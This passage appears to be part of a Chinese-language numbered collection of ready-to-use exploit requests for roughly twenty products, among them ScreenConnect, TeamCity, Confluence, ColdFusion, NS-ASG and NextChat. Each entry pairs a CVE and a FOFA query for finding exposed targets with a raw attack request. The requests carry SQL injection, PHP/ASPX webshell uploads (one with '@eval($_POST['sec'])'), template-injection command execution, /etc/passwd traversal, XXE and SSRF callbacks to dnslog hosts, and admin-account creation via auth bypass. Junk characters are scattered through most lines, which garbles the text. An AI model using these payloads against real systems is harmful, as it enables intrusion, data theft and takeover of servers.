" g4 r+ _! b/ H$ vContent-Type: application/x-www-form-urlencoded;# q& w9 r, X- U5 Q% }& r
Content-Length: 109/ |- m& Z0 Y: y8 s2 r$ M
Origin: https://58.18.133.60:84431 J( g* u+ E) T/ U' V* K) {' c- P
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
0 R# f/ C/ V$ FSec-Fetch-Dest: empty* b1 u* r# ^+ k0 F
Sec-Fetch-Mode: cors
9 j9 o5 J' W; s$ m7 w( |7 SSec-Fetch-Site: same-origin8 _' b$ Y6 u, O/ M! z9 ^) n, a. Z
X-Forwarded-For: 1.1.1.1
9 p4 r& J6 m% V/ p' W' A. kX-Originating-Ip: 1.1.1.1; k" y1 p" W: i+ h% n
X-Remote-Ip: 1.1.1.1
, B0 Y* i) [7 i* }6 g% o/ e# v/ zX-Remote-Addr: 1.1.1.1
+ [7 G0 }7 r0 H" tTe: trailers @+ Y0 c! Q! B/ ]( u+ W
Connection: close
6 ^% Z/ C6 w) y( P; Q4 Q5 {# g+ z* m, ~ r* l: r% I7 G0 ^
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456# ~. \, ^9 `6 J9 k c
+ ~! Z3 U$ R+ D0 H+ _
: r* @$ f. w: ]0 z3 m120. 北京百绰智能S40管理平台导入web.php任意文件上传5 ^2 _7 |& p7 O3 C8 v; p
CVE-2024-1253
% Z X- }: u5 a& s8 \FOFA:title="Smart管理平台"
- B3 v! g. D# s+ u0 f7 d2 DPOST /useratte/web.php? HTTP/1.1& f8 _( J% Z7 k
Host: ip:port0 J7 o2 T6 [. f9 M2 a
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db) s0 T( O0 |3 K4 b5 r
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
! m8 C) J6 n/ q4 {7 \& _* q: z0 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( v, E8 x; t; `# }; uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 Q! _0 l' R/ V# ZAccept-Encoding: gzip, deflate
& y* {2 G. V" w1 x/ C( [) jContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
' H8 f) ^" X3 Z* i+ i9 m A5 a" ~- \Content-Length: 5972 G; z; E+ ^5 a3 G3 |# [( S7 Z
Origin: https://ip:port
! d6 O" f6 `; q7 lReferer: https://ip:port/sysmanage/licence.php
; [/ L. ^/ f% }8 WUpgrade-Insecure-Requests: 13 T# g( K; V: m7 \9 j7 |. z
Sec-Fetch-Dest: document
: @; }! G) c" E2 _* P8 y# E4 W. }Sec-Fetch-Mode: navigate, r. L$ \, K t" h! Z, A5 s' a
Sec-Fetch-Site: same-origin/ w3 Q0 x! O! N6 v3 D% A1 u0 f
Sec-Fetch-User: ?1
; t! [$ n+ `, y) T! ]! B, S( v% dTe: trailers
. |- |/ l& x/ B* SConnection: close. ~8 ?) N0 l# d% |9 [2 ~
, u5 ]' o7 z6 A3 `6 K-----------------------------423289041236658752706300793282 f% L! g5 B8 k- R6 J( C
Content-Disposition: form-data; name="file_upload"; filename="2.php": J, X2 k5 D- @ [6 G. W
Content-Type: application/octet-stream
0 d7 n2 t' W+ Y
( k; _5 A" l- j+ {3 y; ]# Z<?php phpinfo()?>! J; j8 {4 J- @" K
-----------------------------42328904123665875270630079328
$ S4 e( Z) } u' I, s- D8 OContent-Disposition: form-data; name="id_type"
i/ e5 X9 h# j# `2 X" H y2 I; b* _0 U; K6 Y0 F
1+ |2 E/ i @; b5 g
-----------------------------423289041236658752706300793280 h+ \9 v7 y- _9 r& o* V+ [
Content-Disposition: form-data; name="1_ck"4 I6 ?0 \( [ t; k0 l
2 a* ?2 ] p/ X3 v7 P1_radhttp
9 n6 M& Z" A% p/ c-----------------------------42328904123665875270630079328
0 P c7 x0 X4 f* b* P" HContent-Disposition: form-data; name="mode". d$ o* u. O4 z8 `' P A5 Y
8 }! I0 X# @1 X8 H1 V+ ?7 t" cimport
) ]( A' [+ f0 M. \8 [1 x-----------------------------423289041236658752706300793284 v# `- X! a' D! k0 w5 W0 @
3 V+ F# S! G4 n$ @$ x
9 z" t7 y& O$ V; ~/ Q
文件路径/upload/2.php% t# F( [8 M8 \* h; {; B8 f
7 I* B7 r& |# F121. 北京百绰智能S42管理平台userattestation.php任意文件上传
: p x1 F7 {9 a& ]4 O: GCVE-2024-1918
, B% r& W0 X4 h; Z6 b" L# ZFOFA:title="Smart管理平台"
" ^) t. l( O% k& o# U. sPOST /useratte/userattestation.php HTTP/1.1' ^4 \+ U# P) A" k
Host: 192.168.40.130:8443$ ]8 y3 {4 N8 c3 Z0 z! w
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
. u. h, p; z M! Q- S* EUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko3 J2 U% N% P% b8 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- X- n& K" r/ f3 HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, L+ J: X( Z/ ?+ a% o4 hAccept-Encoding: gzip, deflate
) n& H! I. |2 f% J) @Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793285 S% P- |" @1 D8 d! F
Content-Length: 592& @4 v4 I% V2 P# N5 ]/ q. o) T7 s
Origin: https://192.168.40.130:8443
% ]5 ]/ z6 |, |8 h. X* x& `* OUpgrade-Insecure-Requests: 1
6 l5 ~1 L: Y, TSec-Fetch-Dest: document/ Q, [7 \" Z: z4 m7 a
Sec-Fetch-Mode: navigate2 t1 m, e4 V c( e9 E7 l. h& O
Sec-Fetch-Site: same-origin1 ~ u, z1 r' \5 T
Sec-Fetch-User: ?1
, v2 W0 E7 ]7 y2 WTe: trailers
, l* B: q( J) b% V$ TConnection: close- w5 n% z# v& K# m7 D$ v
" q) k. O2 S M& B. P- `7 @4 F-----------------------------42328904123665875270630079328* |' y+ F C8 l' ~8 s! u
Content-Disposition: form-data; name="web_img"; filename="1.php"
, z) t/ R% T4 h5 B6 A% {% Z$ Y rContent-Type: application/octet-stream7 X# v( t3 N4 U. J9 N; c) L4 U( T+ ^
( \4 [. E) I1 W- C+ m% z+ M<?php phpinfo();?>5 U: n/ m7 |5 w) I$ P4 F
-----------------------------42328904123665875270630079328
% A* @4 H z2 @Content-Disposition: form-data; name="id_type"
: T0 k/ B! `3 v1 b* H
" ?4 ~8 \% c* A5 ? H/ {2 i: I14 n# J' X6 x' t( K. s; m
-----------------------------42328904123665875270630079328
, `9 l5 `. Z1 ~( H! K: W- JContent-Disposition: form-data; name="1_ck"
* X4 P. _/ S% y+ a7 R3 j9 E* g" s7 q4 b' I( M1 Y; ?; l# M
1_radhttp6 Q# u; w6 b5 N) ^8 a6 K% d
-----------------------------42328904123665875270630079328 v7 d- y9 o: @8 C( p* b. C
Content-Disposition: form-data; name="hidwel"2 F5 O# m6 s% Q; l+ n- M: M
' v! R& g4 }: a. B9 K+ j
set
7 l" z3 f0 a7 Z i. W& K-----------------------------42328904123665875270630079328
1 X4 }: {! E6 Y3 E1 w
+ l! Z( `! Y7 E$ p6 B
* m4 }8 z0 ~6 J! Q* u- K* ?boot/web/upload/weblogo/1.php6 K$ { b3 f+ W- G" }5 w1 A
% n, f6 f8 p% o; E! w4 N
122. 北京百绰智能s200管理平台/importexport.php sql注入
9 V/ M( B+ l! b: yCVE-2024-27718FOFA:title="Smart管理平台"
+ L1 }# l3 ?& L% A: @* n其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
/ _+ S- Y6 c7 z1 y3 J6 n6 {GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.19 x$ E5 z( ? u. f
Host: x.x.x.x
8 G( Y7 b7 Q+ U s1 SCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
( @/ x4 j, K. O" {/ OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.00 o$ `& P4 z: w% k# {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 q. h% x+ O/ i/ ~5 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( f( X( m" L5 ?* a6 Y' F
Accept-Encoding: gzip, deflate, br
. w8 f0 Q" Q) p# Y' B% B5 ^& IUpgrade-Insecure-Requests: 1
; t6 @( O3 }" g' E' E3 y6 y* [Sec-Fetch-Dest: document
( Z4 |# O8 J- a- C2 o: eSec-Fetch-Mode: navigate/ J0 C* u5 X' M0 l( V& I% H9 Z
Sec-Fetch-Site: none
( {2 u' R% Z1 } @1 D" ISec-Fetch-User: ?1. e: c" N; @. B6 W3 \
Te: trailers
2 e# K% x% O8 Z6 ]) O" z5 mConnection: close
& M* B+ M* p* U$ p% A: l
- v7 a5 h; I. }& F, d( J) ?6 Q) e$ R7 }! k8 X* G$ H" `" N
123. Atlassian Confluence 模板注入代码执行
: a- A, L- d3 i- ~. BFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"4 S4 D% E: @1 I1 @5 N
POST /template/aui/text-inline.vm HTTP/1.1# t5 |1 r2 I* M+ C$ s/ Z
Host: localhost:8090
; B1 r0 t$ ]( }" A( d I: _9 HAccept-Encoding: gzip, deflate, br" i* }. E8 [% j; i) I( i
Accept: */*' D- A6 O* ?' _3 N3 F3 l
Accept-Language: en-US;q=0.9,en;q=0.8, i9 @- R% x6 u# h, G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
2 ~+ ]! D2 L) A% g: G6 [# y6 yConnection: close6 `" ]/ z( P) K
Content-Type: application/x-www-form-urlencoded/ ~; V7 H8 y7 ]3 _; y
: H4 ?, k* F4 b( Z, K3 Xlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})). \" r2 x4 m1 ~6 D, t
7 N) ?. Y) p9 A2 V* B3 @6 _4 b7 u
) G! y* x6 w- ? |
124. 湖南建研工程质量检测系统任意文件上传
8 _% k8 X6 z O' JFOFA:body="/Content/Theme/Standard/webSite/login.css"
& x, Y! {9 ~1 I* APOST /Scripts/admintool?type=updatefile HTTP/1.1
1 A7 I- Z$ ~% t ]: mHost: 192.168.40.130:8282* s2 {4 k2 w, ^6 L- U
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36# p" m2 x# q G: K0 J3 {7 G2 u4 R
Content-Length: 72- K9 j! S& h8 s. e7 l3 ?/ g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8+ k0 F/ \4 w: F+ @! |
Accept-Encoding: gzip, deflate, br7 w) P' X4 x; c; s/ z, y9 {* p7 X+ E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ g" q3 c( F) F* W0 A6 X' v' t4 F
Connection: close
3 R8 H6 Q. J" rContent-Type: application/x-www-form-urlencoded
2 m& [2 |& O, t5 I$ b7 K
/ R @( G3 M. J5 z; B: A* X4 LfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
: A. G$ O5 \6 x2 y4 O2 }% m' K! o
. U% Z9 G0 S( O5 n- T z" H4 ?, ^
http://192.168.40.130:8282/Scripts/abcgcg.aspx6 {) j) R& [" F# s4 U! B: W# b2 M
6 Y% D6 X' G) |* O$ R5 D, _
125. ConnectWise ScreenConnect身份验证绕过
# Z! V* T( s' n: |. ~8 Q- NCVE-2024-1709
% t$ T( b# N: H: L% W" P, `FOFA:icon_hash="-82958153"
2 y) P9 q* s; v/ [/ Mhttps://github.com/watchtowrlabs ... bypass-add-user-poc
( Y* ]* b* i7 Z! S9 g! R1 _0 I
* d- r2 K r9 G$ Z2 u; b0 g* H( z' F7 c9 m6 u
使用方法! G; Y& t9 p. u2 F- P
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
3 q) _" {# ~" R, g6 r( H
7 L# i% i. N4 u$ y9 s6 [( o9 @
5 G, G8 ~7 Z2 @' p. G9 C6 `创建好用户后直接登录后台,可以执行系统命令。5 A' G7 K8 V0 J3 h3 k
! F4 d7 ~3 ^* Q+ E126. Aiohttp 路径遍历! P) ^6 ]; g9 N2 k# p( o
FOFA:title=="ComfyUI", U0 h: Y: x, N' W# n
GET /static/../../../../../etc/passwd HTTP/1.1- q/ V$ i/ p' a+ j9 Z2 q% p" h% S
Host: x.x.x.x; h; F m$ a% H1 m* S; c; u2 H. T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36. `% F e& d& [4 q
Connection: close1 m" D; j% Z" c) n2 o
Accept: */*5 c# c) P/ w% _1 c$ b, y z7 ]2 W
Accept-Language: en! B8 W2 k; R6 k4 y/ i1 o
Accept-Encoding: gzip+ a. s$ }( Q, x0 Q5 t
! B( Q' q, x1 z5 e1 x. w
r4 ?( F- }$ j! {, Q127. 广联达Linkworks DataExchange.ashx XXE# [/ S+ S: f* s( [! l* M+ ]
FOFA:body="Services/Identification/login.ashx" 7 _0 [5 ?, R6 Y
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
% k, [; T% S) E k! w8 i' S; W8 T2 jHost: 192.168.40.130:8888
1 z* p L8 F" `7 {/ g3 X, AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
% [: e8 z2 X6 C' ZContent-Length: 415
. x5 ]# n+ w/ @8 t% pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 @" H% X% g! t5 O! ~3 z
Accept-Encoding: gzip, deflate
7 ?0 G1 P0 S9 @ w4 @Accept-Language: zh-CN,zh;q=0.9
5 k7 P% o/ |, ^: X& }. zConnection: close, v. C, Q3 J% _! _
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
: q' o0 }$ u5 e- z2 V ?5 HPurpose: prefetch; A: p5 x- ?8 `4 G
Sec-Purpose: prefetch;prerender( x2 z8 `% e4 e- ?: W* `
: y, _4 A0 e$ V6 x& B" \3 a------WebKitFormBoundaryJGgV5l5ta05yAIe0$ o) ~1 O4 P0 {; V* A3 J
Content-Disposition: form-data;name="SystemName", ]) {, T- B3 v& Q
" S1 c: l4 C0 l* C d5 F3 ABIM
/ t5 G7 H* |( [3 u------WebKitFormBoundaryJGgV5l5ta05yAIe0
$ G1 a4 u' o; F5 U. T7 _Content-Disposition: form-data;name="Params"
/ e' S) k: p$ v7 @Content-Type: text/plain' t( Z6 C9 a" {+ @% X8 v
g; ?, U4 [0 M<?xml version="1.0" encoding="UTF-8"?>8 C' p, z" |; b) L; S
<!DOCTYPE test [$ y& r" }9 M$ `4 l+ B% K
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
4 H/ S* }4 i: ~( s0 t* e) r* R7 o]
. Y3 I3 [- F& U8 @% s* ]/ @>7 a; ^% _9 |8 C8 J2 ]
<test>&t;</test>
0 H# L' F, A& q4 B3 T------WebKitFormBoundaryJGgV5l5ta05yAIe0--
% p6 N+ h( W: M1 d; F% E+ o: Q$ p: T0 K0 U) w! [4 ?
5 R H" f- R1 g. B( f' U9 F2 T0 f: Q4 C2 [
128. Adobe ColdFusion 反序列化
5 _$ q# g, W' m; _/ r4 k9 QCVE-2023-38203* U$ s: X% Z: L9 f$ U
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)8 L( f) o R: r9 B$ n
FOFA:app="Adobe-ColdFusion"
7 d' W( u. K. w) p0 qPAYLOAD
. d8 m H3 h" H. k- ], ^/ o+ ~! x
) f% [& p* `9 H$ W129. Adobe ColdFusion 任意文件读取- b3 Z, w/ [( o7 G+ P4 f
CVE-2024-20767
" x! }- l {6 L! t9 UFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
- Q6 V8 ?% Q) U$ h2 O- M- f9 ]第一步,获取uuid
7 J. p! [" [0 b0 S1 ~6 eGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
% D2 _" R, p3 L. ?" ZHost: x.x.x.x
0 K% e P4 C$ E% {, R+ J$ aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
# x& m2 Y& r( M7 L0 P# Y9 |Accept: */*
! S# d6 V& E. o4 j, J* {Accept-Encoding: gzip, deflate
* F4 U$ B6 E2 L; I7 m4 [Connection: close
0 L8 |( z* i8 r; [
( K; O" J* u1 w* ?" O" p6 O- E8 n8 P3 G1 @) I7 T
第二步,读取/etc/passwd文件
4 I/ T( R! r& W# |) O2 n" Y$ c. TGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1& m8 t3 s& Z; g9 C) s
Host: x.x.x.x" q& j9 ~- j. u5 Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- V h) m( f+ ^: s9 C8 b1 ?* I0 ?
Accept: */*
: f$ J. j. h4 ~# K" I* c& _) Y+ TAccept-Encoding: gzip, deflate6 W# X( d7 Z. Z5 C9 S" S* u" I
Connection: close0 u) [2 ~; R& d. u( p8 v! v8 U; V7 ^
uuid: 85f60018-a654-4410-a783-f81cbd5000b93 q& N, G( e% ]# J* F& P+ U
7 S/ x, l" Q0 K7 V) N9 i
* S( u* L7 ~7 Y& r7 S' ~3 R
130. Laykefu客服系统任意文件上传
, C" b' g# Y/ |5 t6 ?" J0 nFOFA:icon_hash="-334624619": k, f# }5 `9 U- q: v' G1 {% N) J3 N' ]
POST /admin/users/upavatar.html HTTP/1.1
& r, a: E! H9 N0 d: F1 Y2 B8 BHost: 127.0.0.1
6 }/ X7 [1 j$ d/ h3 L% `Accept: application/json, text/javascript, */*; q=0.01
+ o' y2 i u9 Q- UX-Requested-With: XMLHttpRequest* A) C- Q; D% j. P4 R P# ?! f
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
' v6 N$ r% r$ o' A" I6 ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
! P) F# s- L: H6 B2 ?Accept-Encoding: gzip, deflate
( d1 E4 q: L) e3 d! O0 GAccept-Language: zh-CN,zh;q=0.94 I2 H+ L# h. G+ B; t1 K
Cookie: user_name=1; user_id=3; c9 `' I& R* }' V5 s
Connection: close3 h2 t: D" \) c8 h
2 Q; i( O6 m. t3 ]1 e$ a( @------WebKitFormBoundary3OCVBiwBVsNuB2kR! \* S9 V! B" \, ~! L# g0 z, T. M
Content-Disposition: form-data; name="file"; filename="1.php"2 ]& I+ V9 d- O5 ~# |2 d( ^! a! @
Content-Type: image/png* T) K4 G1 h" G1 v" y( u
5 o# A- `# u( G<?php phpinfo();@eval($_POST['sec']);?>
, `! w* I7 s; a------WebKitFormBoundary3OCVBiwBVsNuB2kR--1 u! ?- j# }# ]: S8 v# ?8 t- }( V
9 B: j9 u/ C" ^3 I0 ^8 ^
4 ~ N& f& o& u7 X: J! ~
131. Mini-Tmall <=20231017 SQL注入6 o- E4 k2 A; ?( W# }. O
FOFA:icon_hash="-2087517259"
6 x* _7 b3 }! q' R' r9 B% n1 K% L后台地址:http://localhost:8080/tmall/admin
% H$ e3 l6 T& b: Vhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)( Z# c; v2 Y# U9 D" d& |6 q6 @" |
! H5 y3 {" Q8 c
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
+ `8 C' Q8 r1 gCVE-2024-271980 q- M" Y; M) g1 R8 _2 p
FOFA:body="Log in to TeamCity"
( n$ c/ n2 a; `* VPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
" y6 r5 D. S. e& uHost: 192.168.40.130:8111' {. A! y" A9 ?9 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 ?$ P. F) M' h& e/ f, x* m( hAccept: */*
$ A' o$ Y3 e1 S0 _Content-Type: application/json9 w$ z: ]! j% Y3 M$ b, h
Accept-Encoding: gzip, deflate
' o) y8 t- C' v1 H1 I0 _0 R- b ~) c; R4 ~2 `8 @8 M4 P2 Z
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}1 l" X+ q4 Z) V( x/ P& M
5 R4 T9 g( S% m2 D
k0 |2 @: W1 P0 b* KCVE-2024-271998 q, `% \" J. I; w/ R$ R9 Z% e
/res/../admin/diagnostic.jsp
Z4 v$ |5 B" b' {- u' Q, Z/.well-known/acme-challenge/../../admin/diagnostic.jsp# I- x5 Z! \" M" l3 ]: |0 U' m/ W9 x
/update/../admin/diagnostic.jsp- V+ ^+ F& p% ~4 F
; o# {3 Q8 r5 K! R9 p3 B
/ }; _4 q7 I- j8 Y0 O
CVE-2024-27198-RCE.py5 {; X) e& b; B6 |0 ]: O$ w
9 a' H8 {8 c) b9 y133. H5 云商城 file.php 文件上传
8 P: K5 T7 A/ S+ Q* aFOFA:body="/public/qbsp.php"; g/ p& q+ I- A5 S9 E
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
( B: [ J a& o1 m9 W6 P, [Host: your-ip6 U6 w. _9 }, K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36. |+ V" u) Y4 ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
/ d. s1 ^4 D# K) Q7 {6 U* P- C0 n0 l4 J2 g. n& S4 r
------WebKitFormBoundaryFQqYtrIWb8iBxUCx0 o- F/ c* M7 {2 i, l* d$ [) l0 F4 T
Content-Disposition: form-data; name="file"; filename="rce.php"
7 f. u) F; D" j+ F2 F' U0 h% V) tContent-Type: application/octet-stream
5 M' }* v; j4 [6 t 9 w% k U, X0 V# N) O7 t8 ~
<?php system("cat /etc/passwd");unlink(__FILE__);?>
/ }' l, z2 G- U4 G# k! P! o! }" ?------WebKitFormBoundaryFQqYtrIWb8iBxUCx--5 X$ U" k) {/ f& v( ^) P# \
. \0 ~" ]5 Q7 ^( s; _& I
* C: X2 H/ V! P) {# \
. v5 g- M, z6 [/ N' S- t
134. 网康NS-ASG应用安全网关index.php sql注入; o" F+ }( _$ ^3 U4 w( \
CVE-2024-2330
4 `: Z2 h1 D( X7 X( UNetentsec NS-ASG Application Security Gateway 6.3版本3 [/ X" l q" O+ l" j+ n
FOFA:app="网康科技-NS-ASG安全网关"
0 n8 Z6 x+ y) J( Y) ~1 N; O5 NPOST /protocol/index.php HTTP/1.1
" j; y8 u7 _! j2 {" JHost: x.x.x.x; d G1 k* B1 D9 ~+ e) I. Y$ m1 B$ W
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de' J& x [; J# g5 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0! A) U) [- v: H4 m1 K* W- I
Accept: */*% c- n7 J2 u* a- ?3 [( c9 p$ M% n, {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. P. p5 T& d& M' z. [7 B0 w
Accept-Encoding: gzip, deflate4 `) ]$ L3 [5 H8 `$ s9 t8 a
Sec-Fetch-Dest: empty
6 r8 k1 {6 a! Q2 Z$ ^8 j: u" eSec-Fetch-Mode: cors5 _- [, K. d5 ]) w
Sec-Fetch-Site: same-origin Q7 V" q0 }$ }1 U' o
Te: trailers9 F3 O' a: l: ^6 D K: G/ s
Connection: close6 s4 z2 {! {/ m$ E! h. x' s D* Y
Content-Type: application/x-www-form-urlencoded0 U) t k- y) q& w- U% f2 X6 B' }' j( o
Content-Length: 263
' G$ O/ ?6 P, F# H0 h9 [8 m) R) D6 U8 U6 `( ~
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
& m- c/ I, e1 k- M" ^' G! _3 L7 P* {+ c% k; d& H/ `9 y
/ D4 v9 |1 c5 X; U" `135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
8 @2 j' I/ A6 \) s5 e2 `: n2 {/ y, sCVE-2024-2022
8 D; ^5 G& ]( ^1 gNetentsec NS-ASG Application Security Gateway 6.3版本( E) {$ R3 I5 b5 d
FOFA:app="网康科技-NS-ASG安全网关"" D4 ]7 J1 B: j' ]+ g' q: H
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
7 x y; y, C' M# i! d3 Q; f9 UHost: x.x.x.x
. ]3 K. e4 A' ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
h- }# x3 s& l% z) [* mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% Q% z9 l( F. E8 O% N
Accept-Encoding: gzip, deflate8 Z# |8 f# [& E; h* ~3 H) h
Accept-Language: zh-CN,zh;q=0.9
8 R: q( I; s" R+ n1 D ?5 JConnection: close
- z; {6 ~) u: T3 W0 }6 C% e) ]- L G, d2 G7 ]1 o
9 k3 f: k& T; P' d- f& D- O
136. NextChat cors SSRF# L& W* D5 f6 B$ ?+ }3 [8 G
CVE-2023-49785
" m6 \3 z o: L- M, fFOFA:title="NextChat"
. d3 X- S. _; SGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
* T- g% q& z7 W, BHost: x.x.x.x:10000
! `+ Q) f: i5 J4 pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
m5 W9 B( @5 xConnection: close
# F3 g P u# d' lAccept: */*
6 }' q- t( R; s4 kAccept-Language: en
, Z; p0 _6 x3 B% \0 @. r$ U/ O! ?Accept-Encoding: gzip5 G7 g% S8 L7 t% h7 X
( D. ], N$ v% c
& a( U/ ^; p, [. H0 C137. 福建科立迅通信指挥调度平台down_file.php sql注入
; d! m" f# Z3 e; H$ t5 A% zCVE-2024-2620- q. W+ O. `4 n2 |& [- m
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"- p8 ^7 Q3 B! E
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.15 C. F; Q' {1 D4 ^
Host: x.x.x.x
+ f, N+ U- q, ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! L9 f+ c, Q8 i( ]+ r: z' } uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- H! Y3 ~* G A) u$ {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 G) e$ e$ i+ W0 F# xAccept-Encoding: gzip, deflate, br1 K: u% u. V* U; H0 I" W
Connection: close
) `' ]% V7 j- B2 v" ICookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
7 g2 g; v' K3 lUpgrade-Insecure-Requests: 1/ \! i: f4 X3 \% v: R3 o& a% M
+ X* N9 e# P; a( C/ x1 M
5 n) r2 R8 c$ Z: H$ o. M138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
8 q( z! c% x& u) Q. sCVE-2024-2621# r) f3 v4 I0 j; T
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 }/ p8 ?$ t8 t- ^8 I
